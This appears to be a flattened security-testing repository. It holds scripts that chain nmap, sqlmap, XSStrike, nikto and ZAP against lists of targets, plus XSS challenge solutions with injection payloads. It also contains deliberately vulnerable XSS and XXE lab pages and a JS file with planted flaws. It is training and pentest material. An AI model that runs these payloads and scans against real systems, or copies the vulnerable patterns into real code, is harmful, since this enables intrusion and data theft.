-sV -oA "$parameterO" "$parameterH" 47 | else 48 | echo "quick nmap scan..." 49 | nmap -sC -sV -oA "$parameterO" "$parameterH" 50 | fi 51 | 52 | -------------------------------------------------------------------------------- /Scripts/portscan-result-basic-comparer.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | 3 | def run_scan(target_host, scan_tool): 4 | if scan_tool == "nmap": 5 | result = subprocess.run(["nmap", "-sS", target_host], capture_output=True, text=True) 6 | ports = [] 7 | for line in result.stdout.split("\n"): 8 | if "open" in line: 9 | port = line.split("/")[0] 10 | ports.append(port) 11 | return ports 12 | elif scan_tool == "masscan": 13 | result = subprocess.run(["masscan", target_host], capture_output=True, text=True) 14 | ports = [] 15 | for line in result.stdout.split("\n"): 16 | if "open" in line: 17 | port = line.split(" ")[3].split("/")[0] 18 | ports.append(port) 19 | return ports 20 | elif scan_tool == "recon-ng": 21 | result = subprocess.run(["recon-ng", "--no-check", "-m", "scanner/portscan/tcp", "--workspace", "default", "-e", f"RHOSTS={target_host}"], capture_output=True, text=True) 22 | ports = [] 23 | for line in result.stdout.split("\n"): 24 | if "open" in line: 25 | port = line.split(" ")[2] 26 | ports.append(port) 27 | return ports 28 | else: 29 | return [] 30 | 31 | def compare_scans(target_host): 32 | nmap_ports = run_scan(target_host, "nmap") 33 | masscan_ports = run_scan(target_host, "masscan") 34 | recon_ports = run_scan(target_host, "recon-ng") 35 | print(f"Nmap found the following open ports: {nmap_ports}") 36 | print(f"Masscan found the following open ports: {masscan_ports}") 37 | print(f"Recon-ng found the following open ports: {recon_ports}") 38 | common_ports = set(nmap_ports) & set(masscan_ports) & set(recon_ports) 39 | if common_ports: 40 | print(f"The following ports were found open by all three tools: {list(common_ports)}") 41 | else: 42 | print("No common open ports were found by all three tools.") 43 | 44 | if __name__ == "__main__": 45 | target_host = input("Enter the target host: ") 46 | compare_scans(target_host) 47 | -------------------------------------------------------------------------------- /Scripts/portscan-runtime-comparer.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Check if the required parameters are provided 4 | if [ $# -ne 1 ]; then 5 | echo "Usage: $0 " 6 | exit 1 7 | fi 8 | 9 | # Define the target host 10 | target_host=$1 11 | 12 | # Define the current date and time 13 | current_time=$(date +%s) 14 | 15 | # Run Nmap 16 | start_nmap=$(date +%s) 17 | nmap_ports=$(nmap -sS $target_host | grep open | awk '{print $1}' | tr '\n' ',' | sed 's/,$//') 18 | end_nmap=$(date +%s) 19 | nmap_time=$((end_nmap - start_nmap)) 20 | 21 | # Run Masscan 22 | start_masscan=$(date +%s) 23 | masscan_ports=$(masscan $target_host | grep open | awk '{print $3}' | tr '\n' ',' | sed 's/,$//') 24 | end_masscan=$(date +%s) 25 | masscan_time=$((end_masscan - start_masscan)) 26 | 27 | # Run Recon-ng 28 | start_recon=$(date +%s) 29 | recon_ports=$(recon-ng --no-check -m scanner/portscan/tcp --workspace default -e RHOSTS=$target_host | grep open | awk '{print $2}' | tr '\n' ',' | sed 's/,$//') 30 | end_recon=$(date +%s) 31 | recon_time=$((end_recon - start_recon)) 32 | 33 | # Print the results 34 | echo "Nmap took $nmap_time seconds to run and found the following open ports: $nmap_ports" 35 | echo "Masscan took $masscan_time seconds to run and found the following open ports: $masscan_ports" 36 | echo "Recon-ng took $recon_time seconds to run and found the following open ports: $recon_ports" 37 | -------------------------------------------------------------------------------- /Scripts/resources.txt: -------------------------------------------------------------------------------- 1 | https://www.darkreading.com/rss_simple.asp 2 | https://threatpost.com/feed/ 3 | https://www.schneier.com/blog/atom.xml 4 | https://nakedsecurity.sophos.com/feed/ 5 | https://www.zdnet.com/topic/security/rss.xml 6 | https://www.bleepingcomputer.com/feed/ 7 | https://www.csoonline.com/index.rss 8 | https://www.wired.com/category/security/feed/ 9 | https://www.helpnetsecurity.com/feed/ 10 | https://securityaffairs.co/wordpress/feed 11 | https://www.securityweek.com/rss 12 | https://www.bankinfosecurity.com/rss.php 13 | https://www.cyberscoop.com/feed/ 14 | https://www.databreachtoday.com/rss.php 15 | https://www.fireeye.com/blog/threat-research/_jcr_content.feed 16 | https://www.infosecurity-magazine.com/rss/news/ 17 | https://www.securitymagazine.com/rss/topic/2236-cyber-security-news 18 | https://www.techrepublic.com/rssfeeds/topic/security/ 19 | https://blog.trendmicro.com/feed/ 20 | https://www.technologyreview.com/topic/cybersecurity/rss/ 21 | -------------------------------------------------------------------------------- /Scripts/scanMultipleDomains.sh: -------------------------------------------------------------------------------- 1 | helpFunction() 2 | { 3 | echo "" 4 | echo "Usage: $0 -a true/[EMPTY] -f domain.txt" 5 | echo -e "\t-f FileName(domains.txt or domain.lst)" 6 | echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true" 7 | exit 1 # Exit script after printing help 8 | } 9 | 10 | while getopts "f:a:" opt 11 | do 12 | case "$opt" in 13 | f ) parameterF="$OPTARG" ;; 14 | a ) parameterA="$OPTARG" ;; 15 | esac 16 | done 17 | 18 | #if advanced is set do a full portscan 19 | if [ "$parameterA" == "true" ] 20 | then 21 | echo "$parameterF" 22 | while read line; do 23 | echo "Starting: $line" 24 | sh initialScan.sh -h "$line" -o "$line" -a "true" 25 | done < "$parameterF" 26 | else 27 | echo "$parameterF" 28 | while read line; do 29 | echo "Starting: $line" 30 | sh initialScan.sh -h "$line" -o "$line" 31 | done < "$parameterF" 32 | fi 33 | -------------------------------------------------------------------------------- /Scripts/sqliList.sh: -------------------------------------------------------------------------------- 1 | helpFunction() 2 | { 3 | echo "" 4 | echo "Usage: $0 -a true/[EMPTY] -f domain.txt" 5 | echo -e "\t-f FileName(domains.txt or domain.lst)" 6 | echo -e "\t-a OPTIONAL: Advanced(run portscan on all ports), set to value true" 7 | exit 1 # Exit script after printing help 8 | } 9 | 10 | while getopts "f:a:" opt 11 | do 12 | case "$opt" in 13 | f ) parameterF="$OPTARG" ;; 14 | a ) parameterA="$OPTARG" ;; 15 | esac 16 | done 17 | 18 | while read line; do 19 | echo "Starting: $line" 20 | sqlmap -u "$line" >> "$parameterF-sqlmap.txt" 21 | done < "$parameterF" 22 | 23 | -------------------------------------------------------------------------------- /Scripts/techStream.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | import datetime 4 | 5 | # Read the list of cybersecurity resources from an external file 6 | with open("techStream/resources.txt", "r") as f: 7 | urls = f.read().splitlines() 8 | 9 | # Create a new HTML document 10 | html = "Cybersecurity Articles" 11 | 12 | # Loop through each URL and scrape the latest articles 13 | for url in urls: 14 | response = requests.get(url) 15 | soup = BeautifulSoup(response.content, features="xml") 16 | 17 | # Extract the title, link, and summary of the latest articles 18 | articles = soup.find_all("item")[:5] 19 | for article in articles: 20 | title = article.find("title").text 21 | link = article.find("link").text 22 | summary = article.find("description").text 23 | 24 | # Add the title, link, and summary to the HTML document 25 | html += "

" + title + "

" 26 | html += "

" + summary + "

" 27 | 28 | # Close the HTML document 29 | html += "" 30 | 31 | # Save the HTML document to a file 32 | timestamp = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S") 33 | filename = f"techStream/cybersecurity-articles-{timestamp}.html" 34 | with open(filename, "w") as f: 35 | f.write(html) 36 | print(f"HTML document saved to {filename}") 37 | -------------------------------------------------------------------------------- /Scripts/techStream/readme.md: -------------------------------------------------------------------------------- 1 | # Cybersecurity Articles 2 | This Python script scrapes the latest cybersecurity articles from a list of websites and outputs them to an HTML file. 3 | 4 | # Requirements 5 | - Python 3.x 6 | - requests library (pip install requests/pip3 install requests) 7 | - BeautifulSoup library (pip install beautifulsoup4/pip3 install beautifulsoup4) 8 | 9 | # Usage 10 | - Clone or download the repository. 11 | - Open the techStream/resources.txt file and add the URLs of the websites you want to scrape, one per line. 12 | - Open a terminal or command prompt and navigate to the directory containing the script. 13 | - Run the script using the command python techStream.py / python3 techStream.py 14 | - The latest articles from each website will be saved to an HTML file in the same directory as the script. 15 | 16 | # License 17 | This project is licensed under the MIT License. See the LICENSE file for details. 18 | -------------------------------------------------------------------------------- /Scripts/techStream/resources.txt: -------------------------------------------------------------------------------- 1 | https://www.darkreading.com/rss_simple.asp 2 | https://threatpost.com/feed/ 3 | https://www.schneier.com/blog/atom.xml 4 | https://nakedsecurity.sophos.com/feed/ 5 | https://www.zdnet.com/topic/security/rss.xml 6 | https://www.bleepingcomputer.com/feed/ 7 | https://www.csoonline.com/index.rss 8 | https://www.wired.com/category/security/feed/ 9 | https://www.helpnetsecurity.com/feed/ 10 | https://securityaffairs.co/wordpress/feed 11 | https://www.securityweek.com/rss 12 | https://www.bankinfosecurity.com/rss.php 13 | https://www.cyberscoop.com/feed/ 14 | https://www.databreachtoday.com/rss.php 15 | https://www.fireeye.com/blog/threat-research/_jcr_content.feed 16 | https://www.infosecurity-magazine.com/rss/news/ 17 | https://www.securitymagazine.com/rss/topic/2236-cyber-security-news 18 | https://www.techrepublic.com/rssfeeds/topic/security/ 19 | https://blog.trendmicro.com/feed/ 20 | https://www.technologyreview.com/topic/cybersecurity/rss/ 21 | -------------------------------------------------------------------------------- /Scripts/techStream/techStream.py: -------------------------------------------------------------------------------- 1 | import requests 2 | from bs4 import BeautifulSoup 3 | import datetime 4 | 5 | # Read the list of cybersecurity resources from an external file 6 | with open("techStream/resources.txt", "r") as f: 7 | urls = f.read().splitlines() 8 | 9 | # Create a new HTML document 10 | html = "Cybersecurity Articles" 11 | 12 | # Loop through each URL and scrape the latest articles 13 | for url in urls: 14 | response = requests.get(url) 15 | soup = BeautifulSoup(response.content, features="xml") 16 | 17 | # Extract the title, link, and summary of the latest articles 18 | articles = soup.find_all("item")[:5] 19 | for article in articles: 20 | title = article.find("title").text 21 | link = article.find("link").text 22 | summary = article.find("description").text 23 | 24 | # Add the title, link, and summary to the HTML document 25 | html += "

" + title + "

" 26 | html += "

" + summary + "

" 27 | 28 | # Close the HTML document 29 | html += "" 30 | 31 | # Save the HTML document to a file 32 | timestamp = datetime.datetime.now().strftime("%Y-%m-%d-%H-%M-%S") 33 | filename = f"techStream/cybersecurity-articles-{timestamp}.html" 34 | with open(filename, "w") as f: 35 | f.write(html) 36 | print(f"HTML document saved to {filename}") 37 | -------------------------------------------------------------------------------- /Scripts/webapp_pentest.py: -------------------------------------------------------------------------------- 1 | import os 2 | import sys 3 | import requests 4 | from bs4 import BeautifulSoup 5 | 6 | def run_command(cmd): 7 | print(f"Executing: {cmd}") 8 | os.system(cmd) 9 | 10 | def check_cms(target_url): 11 | cms = None 12 | try: 13 | response = requests.get(target_url) 14 | soup = BeautifulSoup(response.content, 'html.parser') 15 | meta_generator = soup.find('meta', attrs={'name': 'generator'}) 16 | 17 | if meta_generator and 'WordPress' in meta_generator['content']: 18 | cms = 'WordPress' 19 | elif meta_generator and 'Joomla' in meta_generator['content']: 20 | cms = 'Joomla' 21 | except Exception as e: 22 | print(f"Error while detecting CMS: {e}") 23 | 24 | return cms 25 | 26 | def main(): 27 | if len(sys.argv) != 2: 28 | print("Usage: python3 pentest_web_app.py ") 29 | sys.exit(1) 30 | 31 | target_url = sys.argv[1] 32 | 33 | # Detect the CMS (WordPress or Joomla) if possible 34 | cms = check_cms(target_url) 35 | if cms: 36 | print(f"Detected CMS: {cms}") 37 | else: 38 | print("Could not detect CMS") 39 | 40 | # Step 1: Run Nmap to discover open ports and services 41 | nmap_cmd = f"nmap -sV -p- {target_url}" 42 | run_command(nmap_cmd) 43 | 44 | # Step 2: Run Nikto to scan for web application vulnerabilities 45 | nikto_cmd = f"nikto -h {target_url}" 46 | run_command(nikto_cmd) 47 | 48 | # Step 3: Run Dirb to find hidden files and directories 49 | dirb_cmd = f"dirb {target_url}" 50 | run_command(dirb_cmd) 51 | 52 | # Step 4: Run SQLMap to detect and exploit SQL injection vulnerabilities 53 | sqlmap_cmd = f"sqlmap -u {target_url} --batch --crawl=3" 54 | run_command(sqlmap_cmd) 55 | 56 | # Step 5: Run XSSer to find and exploit Cross-Site Scripting (XSS) vulnerabilities 57 | xsser_cmd = f"xsser --auto --url {target_url}" 58 | run_command(xsser_cmd) 59 | 60 | # Step 6: Run Wfuzz to fuzz web applications 61 | wfuzz_cmd = f"wfuzz -c -z file,/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hc 404 {target_url}/FUZZ" 62 | run_command(wfuzz_cmd) 63 | 64 | # Step 7: Run Arachni to scan for web application vulnerabilities 65 | arachni_cmd = f"arachni {target_url} --output-only-positives --report-save-path arachni_report.afr" 66 | run_command(arachni_cmd) 67 | 68 | # Step 8: Run WPScan if the target is a WordPress site 69 | if cms == 'WordPress': 70 | wpscan_cmd = f"wpscan --url {target_url} --enumerate u" 71 | run_command(wpscan_cmd) 72 | 73 | # Step 9: Run JoomScan if the target is a Joomla site 74 | if cms == 'Joomla': 75 | joomscan_cmd = f"joomscan -u {target_url}" 76 | run_command(joomscan_cmd) 77 | 78 | if __name__ == "__main__": 79 | main() 80 | -------------------------------------------------------------------------------- /Scripts/xssList.sh: -------------------------------------------------------------------------------- 1 | tput setaf 2; 2 | echo "==========================================================" 3 | echo "Welcome to my Nub Script for automating xssTrike" 4 | echo "" 5 | echo "Make sure you have Python3 intstalled and XSStrike/xsstrike.py in '$HOME'" 6 | echo "" 7 | echo "Usage: $0 -f domain.txt" 8 | echo -e "\t-f FileName(domains.txt or domain.lst)" 9 | echo "==========================================================" 10 | tput sgr0; 11 | 12 | helpFunction() 13 | { 14 | tput setaf 2; 15 | echo "" 16 | echo "Usage: $0 -f domain.txt" 17 | echo -e "\t-f FileName(domains.txt or domain.lst)" 18 | tput sgr0; 19 | exit 1 # Exit script after printing help 20 | } 21 | 22 | while getopts "f:" opt 23 | do 24 | case "$opt" in 25 | f ) parameterF="$OPTARG" ;; 26 | esac 27 | done 28 | 29 | # Print helpFunction in case parameters are empty 30 | if [ -z "$parameterF" ] 31 | then 32 | echo "Some or all of the parameters are empty"; 33 | helpFunction 34 | fi 35 | 36 | while read line; do 37 | echo "Starting: $line" 38 | python3 $HOME/XSStrike/xsstrike.py -u "$line" >> "XSS_$parameterF.txt" 39 | done < "$parameterF" 40 | -------------------------------------------------------------------------------- /Scripts/zap-scan-order.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | # Define the host to be scanned 4 | host= 5 | 6 | # Define the location of the ZAP CLI installation 7 | zap_cli_location= 8 | 9 | # Define the output file location 10 | output_file= 11 | 12 | # Start ZAP 13 | $zap_cli_location/zap-cli start 14 | 15 | # Spidering the host 16 | $zap_cli_location/zap-cli spider $host 17 | 18 | # Running an AJAX spider 19 | $zap_cli_location/zap-cli ajax-spider $host 20 | 21 | # Wait for spidering to complete 22 | $zap_cli_location/zap-cli wait -t 120 23 | 24 | # Running a quick ZAP scan 25 | $zap_cli_location/zap-cli quick-scan --spider --ajax --output-file $output_file/quick_scan_results.json $host 26 | 27 | # Running a full ZAP scan 28 | $zap_cli_location/zap-cli full-scan --spider --ajax --output-file $output_file/full_scan_results.json $host 29 | 30 | # Stop ZAP 31 | $zap_cli_location/zap-cli stop 32 | -------------------------------------------------------------------------------- /Scripts/zapstrikemap/readme.md: -------------------------------------------------------------------------------- 1 | ## XSStrike: 2 | - sudo apt-get update 3 | - sudo apt-get install python3-pip 4 | - sudo pip3 install XSStrike 5 | 6 | ## SQLMap 7 | - sudo apt-get update 8 | - sudo apt-get install sqlmap 9 | 10 | ## ZAP 11 | sudo apt-get update 12 | sudo apt-get install openjdk-8-jre 13 | sudo apt-get install zaproxy 14 | 15 | ## Run 16 | - Change input file in script 17 | - python3 strike.py 18 | -------------------------------------------------------------------------------- /Scripts/zapstrikemap/strike.py: -------------------------------------------------------------------------------- 1 | import subprocess 2 | 3 | with open("urls.txt") as f: 4 | urls = f.read().splitlines() 5 | 6 | for url in urls: 7 | print("Running XSStrike on:", url) 8 | with open("xsstrike_output_" + url.replace("/", "_") + ".txt", "w") as f: 9 | subprocess.run(["xsstrike", "-u", url], stdout=f, stderr=subprocess.STDOUT) 10 | print("Running sqlmap on:", url) 11 | with open("sqlmap_output_" + url.replace("/", "_") + ".txt", "w") as f: 12 | subprocess.run(["sqlmap", "-u", url, "--batch"], stdout=f, stderr=subprocess.STDOUT) 13 | print("Running OWASP ZAP on:", url) 14 | with open("zap_output_" + url.replace("/", "_") + ".txt", "w") as f: 15 | subprocess.run(["zap-cli", "start", "--quick-scan", url], stdout=f, stderr=subprocess.STDOUT) 16 | -------------------------------------------------------------------------------- /SubDomainEnum.md: -------------------------------------------------------------------------------- 1 | - [Usage And flow](#usage-and-flow) 2 | * [Amass](#amass) 3 | + [Installation](#installation) 4 | - [Requirements](#requirements) 5 | - [Steps](#steps) 6 | + [Running amass](#running-amass) 7 | * [Other general tools](#other-general-tools) 8 | - [List of Tools](#list-of-tools) 9 | * [General Tools](#general-tools) 10 | * [Dictionary attacks](#dictionary-attacks) 11 | * [Permutation Scanning](#permutation-scanning) 12 | * [DNS Databases](#dns-databases) 13 | * [Checking SubDomain Status Code](#checking-subdomain-status-code) 14 | 15 | Table of contents generated with markdown-toc 16 | 17 | # Usage And flow 18 | ## Amass 19 | First off, i like to use Amass. It will give me a great amount of results and usually makes the other tools seem like nubs. 20 | ### Installation 21 | #### Requirements 22 | - Brew Needs to be installed 23 | #### Steps 24 | brew tap caffix/amass 25 | brew install amass 26 | ### Running amass 27 | Simple Enum: 28 | amass enum -d example.com 29 | 30 | Intel: 31 | amass intel -org google 32 | This will result in CIDR records: 33 | amass intel -ip -src -cidr IP.IP.IP.IP 34 | ## Other general tools 35 | We can run other tools like SubFinder, FinDomain, dnssearch,... to complete our list, for those see the github pages. 36 | 37 | # List of Tools 38 | ## General Tools 39 | 1. [Amass](https://github.com/OWASP/Amass) 40 | 2. [SubFinder](https://github.com/projectdiscovery/subfinder) 41 | 3. [Findomain](https://github.com/Findomain/Findomain) 42 | 4. [Sublist3r](https://github.com/aboul3la/Sublist3r) 43 | 5. [dnssearch](https://github.com/evilsocket/dnssearch) 44 | 6. [Sudomy](https://github.com/Screetsec/Sudomy) 45 | 46 | 47 | ## Dictionary attacks 48 | 1. [knockPy](https://github.com/guelfoweb/knock) 49 | 2. [DNSRecon](https://github.com/darkoperator/dnsrecon) 50 | 3. [MassDNS](https://github.com/blechschmidt/massdns) 51 | 52 | ## Permutation Scanning 53 | 1. [AltDNS](https://github.com/infosec-au/altdns) 54 | 55 | ## DNS Databases 56 | 1. [DNS Dumpster](https://dnsdumpster.com/) 57 | 2. [Shodan](https://snippets.shodan.io/c/83ldc9nef1Tp2R8C) 58 | 3. [Pentest-tools](https://pentest-tools.com/information-gathering/find-subdomains-of-domain) 59 | 4. [Rapid7 Forward DNS (FDNS)](https://opendata.rapid7.com/sonar.fdns_v2/) 60 | 61 | ## Checking SubDomain Status Code 62 | 1. [URLChecker](https://github.com/evanRubinsteinIT/URLChecker) 63 | 2. [HTTProbe](https://github.com/tomnomnom/httprobe) 64 | 3. [httpx](https://github.com/projectdiscovery/httpx) 65 | 4. [dnsx](https://github.com/projectdiscovery/dnsx) 66 | -------------------------------------------------------------------------------- /THM_riddleme: -------------------------------------------------------------------------------- 1 | First we need to reverse the code 2 | 3 | ngnivilurstetavirparehtneremithW 4 | to 5 | Whtimerentheraprivatetsrulivingn 6 | 7 | Now we need to split it on the known words 8 | Wh timer en the ra private ts ru living n 9 | 10 | And remove them 11 | When the rats run 12 | This is the first code 13 | 14 | The second code can easily be decoded here: 15 | https://www.dcode.fr/monoalphabetic-substitution 16 | 17 | It's a monoalphabetic substitation with the following alphabet: 18 | AZERTYUIOPQSDFGHJKLMWXCVBN 19 | 20 | This gets: 21 | thisisthecode 22 | 23 | Enter both answers to unlock the code! 24 | -------------------------------------------------------------------------------- /TheBasicsOf/JavaScript.js: -------------------------------------------------------------------------------- 1 | // 1. Variables: We can store information in variables. 2 | 3 | var name = "John"; // this is a string 4 | let age = 25; // this is a number 5 | const isStudent = true; // this is a boolean 6 | 7 | // 2. Functions: A block of code designed to perform a particular task. 8 | 9 | function greet(name) { 10 | console.log("Hello, " + name); 11 | } 12 | 13 | // Call the function 14 | greet(name); // Outputs: "Hello, John" 15 | 16 | // 3. Objects: JavaScript objects are containers for named values. 17 | 18 | let student = { 19 | name: "John", 20 | age: 25, 21 | isStudent: true 22 | }; 23 | 24 | // Access object properties 25 | console.log(student.name); // Outputs: "John" 26 | 27 | // 4. Arrays: A special type of object used for storing multiple values in a single variable. 28 | 29 | let array = ["Apple", "Banana", "Cherry"]; 30 | console.log(array[0]); // Outputs: "Apple" 31 | 32 | // 5. Loops: JavaScript supports different kinds of loops. 33 | 34 | // This is a for loop 35 | for (let i = 0; i < array.length; i++) { 36 | console.log(array[i]); // Outputs each fruit in the array 37 | } 38 | 39 | // 6. Conditional Statements: Used to perform different actions based on different conditions. 40 | 41 | if (age >= 18) { 42 | console.log("You are an adult."); // Outputs: "You are an adult." 43 | } else { 44 | console.log("You are a minor."); 45 | } 46 | 47 | // 7. Events: JavaScript's interaction with HTML is handled through events. 48 | 49 | document.getElementById("myButton").onclick = function() { 50 | alert('Hello World!'); 51 | }; 52 | 53 | // This will alert "Hello World!" when the element with id "myButton" is clicked. 54 | -------------------------------------------------------------------------------- /TheBasicsOf/JavaScriptExploits.js: -------------------------------------------------------------------------------- 1 | (function() { 2 | 'use strict'; 3 | 4 | var secretApiToken = 'api1234secret'; // Token shouldn't be hard coded 5 | 6 | // Check for a common feature toggle that developers might forget to turn off 7 | var debugMode = false; // Developers might accidentally leave debug mode on 8 | 9 | var data = { 10 | userId: '', 11 | authToken: '' 12 | }; 13 | 14 | function login(username, password) { 15 | // Passwords should never be sent in plaintext 16 | var xhr = new XMLHttpRequest(); 17 | xhr.open('POST', '/api/login'); 18 | xhr.setRequestHeader('Content-Type', 'application/json'); 19 | xhr.onload = function() { 20 | if (xhr.status === 200) { 21 | var userObj = JSON.parse(xhr.responseText); 22 | data.userId = userObj.userId; 23 | data.authToken = userObj.authToken; 24 | } else { 25 | console.log('Error logging in: ' + xhr.status); 26 | } 27 | }; 28 | xhr.send(JSON.stringify({ 29 | username: username, 30 | password: password 31 | })); 32 | } 33 | 34 | function setDebugMode(status) { 35 | // Vulnerability: Anyone can set debugMode 36 | debugMode = status; 37 | if (debugMode) console.log('Debug mode enabled'); 38 | } 39 | 40 | function debugLog(msg) { 41 | // Logs should not be present in production 42 | if (debugMode) { 43 | console.log(msg); 44 | } 45 | } 46 | 47 | function getSecretApiToken() { 48 | // This function shouldn't exist - it's a big vulnerability 49 | return secretApiToken; 50 | } 51 | 52 | // Other normal application logic 53 | // ... 54 | 55 | // Expose some methods to the window object for external scripts 56 | window.login = login; 57 | window.setDebugMode = setDebugMode; 58 | window.getSecretApiToken = getSecretApiToken; 59 | 60 | })(); 61 | -------------------------------------------------------------------------------- /XSS challenge room solutions: -------------------------------------------------------------------------------- 1 | cheeseBlog-1 Basic reflected XSS on search page 2 | Solution: 3 | 4 | cheeseBlog-2 filtered reflected XSS on search page 5 | Solution: 6 | 7 | cheeseBlog-3 html tag injection into input 8 | Solution: ' onmouseover=alert() ' 9 | 10 | cheeseBlog-4 almost everything except onclick is blocked 11 | Solution: 12 | 13 | cheeseBlog-11 The first 10 characters, it filters < 14 | Solution: gdfhhgjhgjnhgjhgjghj 15 | 16 | cheeseBlog-12 This is really hard, there is a hidden input field on the category page. This is vulnerabile to attribute injection 17 | Solution: ' accesskey=X onclick=alert(1) ' in the title field 18 | Then you need to go to categories and press alt+shift+x 19 | You can only have this ONES on the page and it only works in FF. You can break all the code after it but people will start noticing. x=' 20 | 21 | cheeseBlog-13 22 | You need to do directory brute forcing to find images.php 23 | There you need to enter the following attack vector; 24 | This is because alert is blocked 25 | 26 | cheeseBlog-14 27 | A lot is filtered here 28 | - You need a nullbyte SOMEWHERE in the payload (%00) 29 | - No img tags BUT this is filtered BEFORE the lowercasing AND I am also filtering Img so you need to use iMg tag 30 | 31 | - it will convert the search query to lowercase string 32 | 33 | All of this is filtered AFTER toLowerCase 34 | - no SVG allowed 35 | - No scripts 36 | - No alert 37 | - No confirm 38 | http://23.239.9.22/cheeseBlog-14/search.php?q=fdsfniose0dffdsfsdffds%3CiMg%2500src%3Dx%2500onerror%3Dprompt%28%29%3E 39 | 40 | cheeseBlog-15 41 | You will need double encoding here http://23.239.9.22/cheeseBlog-15/search.php?q=%25253cimg+src%3Dx%3E 42 | %25 url decodes into % 43 | %3c into < 44 | %3e in > 45 | -------------------------------------------------------------------------------- /labs/xss/XSS1.php: -------------------------------------------------------------------------------- 1 | 6 |
7 |
8 |
9 | 10 |
-------------------------------------------------------------------------------- /labs/xss/XSS2.php: -------------------------------------------------------------------------------- 1 | 6 |
7 |
8 |
9 | 10 |
-------------------------------------------------------------------------------- /labs/xss/XSSDOM.php: -------------------------------------------------------------------------------- 1 | Select your favourite cheese: 2 | 3 | -------------------------------------------------------------------------------- /labs/xss/XSSJS.php: -------------------------------------------------------------------------------- 1 | document.write('" . $_GET['fname'] . "');"; 4 | } 5 | ?> 6 | 7 |
8 |
9 |
10 | 11 |
12 | 13 | In here we can see some JS 14 | 15 | document.write('" . $_GET['fname'] . "'); -------------------------------------------------------------------------------- /labs/xss/XSSTAG1.php: -------------------------------------------------------------------------------- 1 | "; 4 | } 5 | ?> 6 | 7 |
8 |
9 |
10 | 11 |
-------------------------------------------------------------------------------- /labs/xss/XSSTAG2.php: -------------------------------------------------------------------------------- 1 | 6 | 7 |
8 |
9 |
10 | 11 |
-------------------------------------------------------------------------------- /labs/xss/XSSWL.php: -------------------------------------------------------------------------------- 1 | 11 | 12 |
13 |
14 |
15 | 16 |
17 |

-------------------------------------------------------------------------------- /labs/xss/b: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /labs/xxe/a: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /labs/xxe/xxe.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 10 | 11 | loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 19 | //Grab the data from the file 20 | $cheese = simplexml_import_dom($dom); 21 | $cheeseType = $cheese->cheeseType; 22 | if($cheeseType==""){ 23 | echo "Please make a POST request with the following data\

<cheese>
    24 | <cheeseType>Test</cheeseType>
25 | </cheese>"; 26 | }else{ 27 | echo "I also LOVEEEE $cheeseType"; 28 | } 29 | 30 | ?> -------------------------------------------------------------------------------- /last_session.json: -------------------------------------------------------------------------------- 1 | [{"url": "http://labs.hackxpert.com:8348//idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "saddsfdsds", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}, {"url": "http://labs.hackxpert.com:8348/idor", "auth_token": "", "method": "POST", "proxy": "http://localhost:8080", "body": "{}", "status_code": 405, "response": "\n\n405 Method Not Allowed\n

Method Not Allowed

\n

The method is not allowed for the requested URL.

\n", "content_type": "JSON"}] -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Subdomain_Enum.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Subdomain_Enum.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 1.png -------------------------------------------------------------------------------- /notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration b9ba6f298bf44f25845e4e0204c9027d/Untitled 2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/The-XSS-Rat/SecurityTesting/3b3a094b24cacb82ce2e74a087fde0248145d16c/notes/Broad scope methodology - Manual 1097d5c08b8a4da0907fd593003272ae/0 Subdomain enumeration 